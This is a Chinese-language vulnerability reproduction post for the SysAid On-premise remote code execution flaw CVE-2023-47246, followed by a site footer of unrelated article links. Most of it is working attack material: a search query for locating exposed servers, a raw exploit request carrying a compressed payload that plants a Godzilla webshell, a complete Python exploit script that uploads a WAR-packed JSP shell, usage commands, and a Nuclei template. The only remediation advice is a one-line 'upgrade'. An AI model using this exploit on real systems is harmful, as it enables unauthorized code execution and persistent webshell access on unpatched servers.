漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)

news2024/12/23 22:10:40

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。

二:漏洞影响版本

version < 23.3.36

三:网络空间测绘查询

title="SysAid Help Desk Software"
image.png

四:漏洞复现

image.png
EXP:

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip
 
{{unquote("x\x9cd\xd4kT\x92\x87\x03\x06\xf0\xd7\xb4\xb4\xff\xdf[\xb3\xcbi\xde\xd6Z\xb3\x96\x16\xc5L@g\x9b\xddN#\xd1U*Fjv\x12\x0e\xa6\xd1`I\x28A\xa7\x8ecFe\xcd\xac\x99\x13\x9b\xa6V\xdeR\x13\x0bT\xca\xa4\x12\xc9.\xe6QAA\x11\xb9\x89 \xbe\x0a\xc8\x0b\xb2\xd3\xa7\xdd\x9eo\xcf\xf3|\xff\xc5\xa3]\xddV\x02\x1e\x80\x07\xf0\xefx\x01\x00p\x86\x92A\xc6\x13\xb32\x28[\xa8\xe9\xe4\xff\xcd\xe0\xf1+\xd2\xc7\x8e\x8d\x1d\xfb\xd6\xfdwOO\xcf\x12\xda\xa6\xfb\xabr\x93\x85Kq]:\x90T\xba\xdc>\xb0\x9dpb\x0eQ\x09;\xe9\xa5\xe6\x167~\x19z\xdd\xf3U\x81g-B\xfc\xc5l\x1b\xed\x1d\x12>\xd5w\xa7\xe8\xd9\xfe\xf1`\xd1$\x13a\x89\xed4\x91\xfb\xbb\x9c_\xed-\x96o\x96\xc9S\xf4m\x1cRZ%\xfe\x84\xa1\xc5k]\x83\\u$p%\xd3\xe6\xf0\xcb#\xee\x89\xed\xb9u\xe7Qy\xe4\xa9\xbch#\x0ad\x92~2?x\xc9N4\xbf\xbe\xec\xc4q\x9b/\x90\x06\x1eQ\xdcc\x83\x0f\xf0|\xbb\xa8\x06#d\xd5\xbc\xcao\xe6\x9b\xeb\x87%7:\xb27\xbf\xb4\x97\xfb0L\xda\xc5h\xf0\xc9#\xf6\x84\x85\xd5y_\xc2\xea\xec\x8d<P?<\xd64x\xf8iO\xeb\x00b\xf0\xa9\x10\xf6\xc1\xf8\xec\x87\x9b\xbe\xafC\x8b\x14\xf7|\xc2\xdbE\x8c\x1a\x05\x140\x7b\x81;iN%#\xc4\x0d\x0fq\"\xc3\x8d9\xcc\xf5CSu\xcdW\x0d\xf4\x90\x9b\xe3\x1b3\x03s\x0e\xab&%1\xc5\xa95D\xca\x04\xfd\xb2\x9a\xb8U\x9f\xc07\xd7\x28_N\xb0\xf7\x05id\xc8\x94\xd0\xda\x0c\xcdmT\x93al \xaco_M\x19*\x8a\x10\xc6\xd2O\xf4\x04\xb2\xa2\xf9\xd6\x9c\x06\x9b\xff\xa6@\"\xbd\x1d\x11#\x85\xb3M\xb1\xefE^\"j\x95\xf7\x1c9\x14\xe7<\xa2:\xc2e\x15\xd4\xa9\xab\xea\x06t\x28n\"\xbd/\x01\x17\xb5\xe4\xaa5\xeb\xbd\x0a\xf1^G\x0f\x97$\xf1\x1f\x82#\xfb\x7b\xcf\xada\xa3\xb1t#\x12f\xe3\x8f\xac`\xda\xb5Y\xe3MoN\xa5\x1dO@\x12d\x0c\xf3\xe7\xb6\x1f\xe3s\xbb\x8b\x92j\xbe\xa9@\x8dnA\xbe\xa6-\xc0%\xc3]\x8e\xaf\xcbm\xf9\xde\xf5H\xf7\xb0\xee\xc6\x80\xbc3`\xba\xdaY\xa8\x1d\\#\xc1\xa8KK\x9c\x05\x8d\xdb\xd6\xc5t\x1c\x0a\xf9\xa5\xf1\xf6\x9e\x93\xda\xf1\x9e~\xe1\x28\xf7\x92\xb9\xac\xffZF!\xcf4-\xf9n\xd8\x7dI\xeb'\x85;\xe3\xee'0\xc2,\xb2C\xb3ym\xe71\x12\x89\xa0\x13\x1f\xb2#\x10\xdb\x18$\xed\xa0=\xb7\x172\x13\x1dZ\xcd\xc1\xdfn\xb5\xbc\x9d\xd8=\x92k\xdc\xd0\xf0\xce\x9fb\xab\xce\x92\xea\x89\xef\xba\xcbJ\xa9'\x9d\xdd\x95\x11\\\xb1\xc6'Ea\xa1\x89\x8a\xf2\x0b\xb9\xd1\x8f;b*\xf4\x82\x7d\x89\x09\"\x8eLKZlF\x1f\xdd\xbe\xcan\xcd,\x7b\xc2\x93\xac]>\xac_d\xe5\xac5\x89c\xbf\xf7\xaf\xc8o@\xa7\x89\xb1\x0c\xa5\xaaw\xeb~\xd2\xa7\x7d\x893\x0e\xceql\x13T\xa9\\`A\x11\xf6Z\x91VN\x91O\x9f\x9e\xda\xf0D\xd3\x1e6\xfe\xff\xe8\x96\xf0\x9dg\x8a\x1a\xf8\xc9w\x17 \xe6\x1co\x97\x8e\xa7\x18\x11\xb4\xc5My;\x86\x9a\xfb\x1do\xae\xca\x83\x98\x18\x7b\x99\xf5\"\xd8\xaa\\\x0f\x81\xc9\"\xf7\xfa$\xe9\xb2*\xb1\x00e\x1ck\x0b\x07\xdfl\xd1]\"9\xf5TlN\\\x8a\xd6u\xfeU\\\xea\x03\xceq\xb9\xfc\xee9O\x0e\xd3\xa8b\x90\xb2\x89\xc5a\x05\xcb\x85\xa0$\xed\x1ec\xb1\x11\x0f\xa3\xd5\x82\xed\x83\xbf.\x9bV\xa7\xa6B\xdbB\xb0\xc4y-\xcd\xef\xa0\xfa\xc5\xd1\x14\xfe\x8b\x8d\x18\xe5\x9d\xb7\xe9\x05\x84\x8c\xecz\xbf\xcd\x7d\xf8\xd0\xf6^:E\xda\xe2\x98'X\x28-\xab\xc58A\x93\xb8\x825 \x13R\xa7\x0c\x01\x7f\xec*\xf7\x13\x19\xc9\xc3\x04\xa8\xbe\x8c\x97;\xdf\x9e\x02\xde\xacr\xbb\xbd\xa9n\x14\xca\x9c\xbc\xc2In\xbd\x82\x14r\x88u\xa3\xa6L\xe6c\x81\xfd\x84\x8c\xfes\x95!A'\xf5\x28U\xe8\xf3\x8b\xd8\xd9\xb3\xb4`\x8c\x0d\xacF\xec\xc0U\xeb^,\x86\xcb\xc9\xc1Q<\xbc \xbd\xa4x\x08\xe5\x18Bf\xd82\xa7u\xd4\xd5\xea\x28\xfe\xce\x05\xa5\x85\x10qe\xf7\xaa\xa4\x91\x8e\x99\xd6\xb3\x7b1\xce\x00H\x18\xe8\xc2z\xd0y\xab\xfc\x9a\x82\x0dm\x15?\x9dq2\xcfGD\xb2>@%\xa4j8\x1c\x86=\xbd\x0d\xe6v\x16\xbe\xbd\x00\xf6\xd9,\xbc9 d\xaf7Km\x00H\x89;\xae\x01\xeb]\xd7_D\xba\xba>G\xe2\x7d\x7d|\x01\xc0\xe9\x8cG\xbb\x7b\xc0\xd9Vb\x90\x1b\x00\xf8\xbb\x01@<\xdae\xc9J\xe0/Z\xfe\xfey\xfd\x07\x9b\x7f@\x13\x8f^\xba\xec\xe3\xe8\x02\xb8\x00\x91\x00\x00$\xbb\x7dl\x7f\x06\x00\x00\xff\xff\xb6ck\x86")}}

注入哥斯拉马马
image.png
马儿URL
http://x.x.x.x/userfiles/index.jsp
image.png
image.png

五:漏洞利用

公开EXP:
https://github.com/W01fh4cker/CVE-2023-47246-EXP
EXP内容:

import argparse
import binascii
import random
import time
import zipfile
import zlib
import urllib3
import requests

urllib3.disable_warnings()

def compressFile(shellFile, warFile):
    try:
        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
            zipf.write(shellFile)
        zipf.close()
        return True
    except:
        return False


def getHexData(warFile):
    with open(warFile, 'rb') as warfile:
        data = warfile.read()
    warfile.close()
    compressed_data = zlib.compress(data)
    hex_data = binascii.hexlify(compressed_data).decode()
    return hex_data


def generateRandomDirectoryName(num):
    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    return ''.join(random.choice(charset) for _ in range(num))


def get_random_agent():
    agent_list = [
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
    ]
    return agent_list[random.randint(0, len(agent_list) - 1)]


def shellUpload(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": get_random_agent()
    }
    shellFileName = shellFile.split(".")[0]
    warFile = f"{shellFileName}.war"
    if compressFile(shellFile, warFile):
        shellHex = getHexData(warFile=warFile)
        data = binascii.unhexlify(shellHex)
        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
        print("\033[92m[+] Shell file compressed successfully!\033[0m")
        return resp
    else:
        print("\033[91m[x] Shell file compression failed.\033[0m")
        exit(0)


def shellTest(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/{directoryName}/{shellFile}"
    headers = {
        "User-Agent": get_random_agent()
    }
    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
    return resp, userEntryUrl

def exploit(url, proxy, shellFile):
    print(f"\033[94m[*] start to attack: {url}\033[0m")
    directoryName = generateRandomDirectoryName(5)
    userentryResp = shellUpload(url, proxy, directoryName, shellFile)
    print(f"\033[94m[*] Wait 9 seconds...\033[0m")
    time.sleep(9)
    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)
    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:
        print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}\033[0m")
    else:
        print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m")


if __name__ == "__main__":
    banner = """
  ______     _______     ____   ___ ____  _____       _  _ _____ ____  _  _    __   
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ /      | || |___  |___ \| || |  / /_  
| |    \ \ / /|  _| _____ __) | | | |__) | |_ \ _____| || |_ / /  __) | || |_| '_ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__   _/ /  / __/|__   _| (_) |
 \____|  \_/  |_____|   |_____|\___/_____|____/         |_|/_/  |_____|  |_|  \___/ 
                                                                                Author: W01fh4cker
                                                                                Blog: https://w01fh4cker.github.io
        """
    print(banner)
    parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",
        add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")
    parser.add_argument("-u", "--url", help="target URL")
    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")
    args = parser.parse_args()
    if args.url.endswith("/"):
        url = args.url[:-1]
    else:
        url = args.url
    if args.proxy:
        proxy = {
            'http': args.proxy,
            'https': args.proxy
        }
    else:
        proxy = {}
    exploit(url, proxy, args.file)

使用

git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
cd CVE-2023-47246-EXP
pip install -r requirements.txt
python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp

六:批量检测


id: CVE-2023-47246

info:
  name: SysAid Server - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
  reference:
    - https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
    - https://www.rapid7.com/blog/post/2023/11/09/etr-cve-2023-47246-sysaid-zero-day-vulnerability-exploited-by-lace-tempest/
    - https://www.cisa.gov/news-events/alerts/2023/11/13/cisa-adds-six-known-exploited-vulnerabilities-catalog
    - https://documentation.sysaid.com/docs/latest-version-installation-files
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-47246
    cwe-id: CWE-22
    epss-score: 0.66797
    epss-percentile: 0.97617
    cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: sysaid
    product: sysaid_on-premises
    shodan-query: http.favicon.hash:1540720428
    fofa-query: icon_hash="1540720428"
  tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive
variables:
  directory: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}
      - |
        @timeout: 15
        GET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"
# digest: 490a004630440220473e18d50551e38c7664fa67cd90a3e4b61bd40e5baacd9648a82b78b592e62d02201470639175be80755dfeddf49cac067a89b6d009911ecce3a0d3b654649a855b:922c64590222798bb761d5b6d8e72950

七:修复建议

升级至最新版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1320281.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Unity3D对TXT文件的操作

系列文章目录 Unity工具 文章目录 系列文章目录前言一、读取txt文档1-1、TextAsset类读取1-2、代码实现1-2、打印结果 二、使用File类读取2-1.使用ReadAllText读取代码如下&#xff1a;2-2、结果如下2-3、使用ReadAllLines读取代码如下&#xff1a;2-4、读取结果 三、文件流读…

【深度学习】序列生成模型(二):束搜索

文章目录 序列生成束搜索理论基础算法步骤python实现 序列生成 在进行最大似然估计训练后的模型 p θ ( x ∣ x 1 : ( t − 1 ) ) p_\theta(x | \mathbf{x}_{1:(t-1)}) pθ​(x∣x1:(t−1)​)&#xff0c;我们可以使用该模型进行序列生成。生成的过程是按照时间顺序逐步生成序…

adb: error: cannot create file/directory ‘d:/1.png‘: No such file or directory

将文件从设备读取到PC 由于权限问题&#xff0c;不能直接pull到电脑磁盘根目录&#xff0c;否则会报错&#xff1a; adb pull <remote> <local> eg: C:\Users\admin>adb pull /sdcard/server.log C:\Users\admin\Desktop /sdcard/server.log: 1 file pulled.…

LeedCode刷题---二分查找类问题

顾得泉&#xff1a;个人主页 个人专栏&#xff1a;《Linux操作系统》 《C/C》 《LeedCode刷题》 键盘敲烂&#xff0c;年薪百万&#xff01; 一、二分查找 题目链接&#xff1a;二分查找 题目描述 给定一个 n 个元素有序的&#xff08;升序&#xff09;整型数组 nums 和一…

基于STC89C51单片机实现的森林防火系统源码+仿真+原理图+设计报告,含视频讲解

森林防火 摘要 森林防火是非常必要的,火灾对森林的破坏是具有毁灭性的,有着很大的危害,在春秋季节森林火灾高发期,若发生火灾,对人民生活带来极大危害,不仅危害人们生产生活,而且对地球环境产生影响.本课题研究的内容是以单片机STC89C51为控制核心&#xff0c;以MQ-2型半导体电…

Android hilt使用

一&#xff0c;添加依赖库 添加依赖库app build.gradle.kts implementation("com.google.dagger:hilt-android:2.49")annotationProcessor("com.google.dagger:hilt-android:2.49")annotationProcessor("com.google.dagger:hilt-compiler:2.49"…

关于前端学习的思考-浮动元素嵌套块级元素12.18

1、块级元素嵌套浮动元素 先摆图片&#xff0c;当橘色的盒子高度减少的时候&#xff0c;NK AD TB PK NN并不会减少。如何解决呢&#xff1f; 加一个overflow&#xff1a;clip或者hidden 2、浮动元素嵌套块级元素 加一个overflow&#xff1a;clip或者hidden 综上所述&#xff0…

2020 年网络安全应急响应分析报告

2020 年全年奇安信集团安服团队共参与和处置了全国范围内 660起网络安全应急响应事件。2020 年全年应急响应处置事件行业 TOP3 分别为:政府部门行业(146 起)医疗卫生行业(90 起)以及事业单位(61 起&#xff0c;事件处置数分别占应急处置所有行业的 22.1%、13.6%、9.2%。2020 年…

修改npm源码解决服务端渲染环境中localstorage报错read properties of undefined (reading getItem)

现象&#xff1a; 这个问题是直接指向了我使用的第三方库good-storage&#xff0c;这是一个对localStorage/sessionStorage做了简单封装的库&#xff0c;因为项目代码有一个缓存cache.ts有用到 原因分析&#xff1a; 从表象上看是storage对象找不到getItem方法&#xff0c; 但…

Vue3使用Three.js导入gltf模型并解决模型为黑色的问题

背景 如今各类数字孪生场景对三维可视化的需求持续旺盛&#xff0c;因为它们可以用来创建数字化的双胞胎&#xff0c;即现实世界的物体或系统的数字化副本。这种技术在工业、建筑、医疗保健和物联网等领域有着广泛的应用&#xff0c;可以帮助人们更好地理解和管理现实世界的事…

Selenium框架的使用心得(一)

最近使用selenium框架实现业务前端的UI自动化&#xff0c;在使用selenium时&#xff0c;有一些心得想要和大家分享一下~ Selenium是一款用于web应用程序测试的工具&#xff0c;常用来实现稳定业务的UI自动化。这里&#xff0c;不想对其发展历史做介绍&#xff0c;也不想用官方…

EXCEL SUM类函数

参考资料 万能函数SUMPRODUCT超实用的10种经典用法 目录 一. SUM二. SUMIF2.1 统计贾1的销售额2.2 > 900 的销售总额2.3 计算贾1和贾22的销售总额2.4 多区域计算 三. SUMIFS3.1 统计苹果&#xff0c;在第一季度的总数量3.2 统计苹果&#xff0c;在第一季度&#xff0c;>…

智能家居和智能家居控制设备有什么区别?

智能家居和智能家居控制设备在功能和用途伤的区别&#xff1a; 智能家居是一种整体的概念&#xff0c;它涵盖了整个家庭环境的智能化&#xff0c;包括智能家电、智能照明、智能安防等设备的互联互通和协同工作。智能家居的目标是通过中央控制器或智能音箱等设备&#xff0c;实现…

Python内置函数一览表

为了提高程序员的开发效率&#xff0c;Python 提供了很多可以直接拿来用的函数&#xff08;初学者可以先理解为方法&#xff09;&#xff0c;每个函数都可以帮助程序员实现某些具体的功能。 举个例子&#xff0c;在 Python 2.x 中 print 只是一个关键字&#xff0c;但在 Pytho…

cefsharp120.1.8(cef120.1.8,Chromium120.0.6099.109)版本升级测试,其他版本H264版本

此版本最新版cef120.1.8,Chromium120.0.6099.109 此更新包括一个高优先级安全更新 This update includes a high priority security update. 说明&#xff1a;本版本暂时不支持264&#xff0c;其他H264版本参考119,116&#xff0c;114&#xff0c;110&#xff0c;109等版本 c…

Spring 原理(一)

